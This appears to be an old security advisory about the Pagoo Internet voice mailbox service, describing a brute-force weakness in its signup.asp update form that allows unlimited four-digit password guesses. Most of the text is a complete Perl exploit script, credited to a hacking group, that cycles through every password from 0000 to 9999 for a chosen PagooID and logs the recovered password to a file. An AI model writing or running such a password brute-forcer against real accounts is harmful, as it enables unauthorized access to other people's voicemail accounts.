|
Vulnerability Pagoo (Pagoo Internet voice MailBox) Affected Those using Pagoo Description Elaich Of Hhp posted following Pagoo VMB remote exploit. This exploit will extract the password to the specified PagooID you specify. The vulnerability comes into play when you connect to your UpdateForm thru signup.asp which requires your PagooID and your 4 digit password. Nothing will prevent you from reconnecting and trying a new password from 0000 in increments of 1 till we reach 9999 which is the highest password possible... Exploit follows: #!/usr/bin/perl # # (hhp) hhp-pagoo.pl (hhp) # by: elaich of the hhp. # http://hhp.hemp.net/ # '99' # # Logs passwds to file: pagooids use IO::Socket; die "usage: $0 <PagooID>\n" unless(@ARGV == 1); ($box) = (@ARGV); open OUT, ">>pagooids" or die "Can't open temp file -> .pagoo\n"; autoflush OUT 1; $host = "www.pagoo.com"; autoflush STDOUT 1; sub parse { ($num) = @_; $url = "/asp/signup/signup.asp?Service=UpdateForm&PagooID=$box&Password=$num"; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 80, Proto => "tcp") or die "Can't connect.\n"; print $socket "GET $url\n"; print "Trying password: $num of 9999.\n"; while(<$socket>) { chomp; if(/Password invalid/) { break; } if(/First Name/) { print "PagooID password extracted...\n"; print "PagooID: $box / Password: $num\n"; print OUT "PagooID: $box / Password: $num\n"; exit 0; } } } $num = '0000'; parse $num; for($i = 0; $i <= 9999; $i++) { $num++; parse $num; } Solution Nothing yet.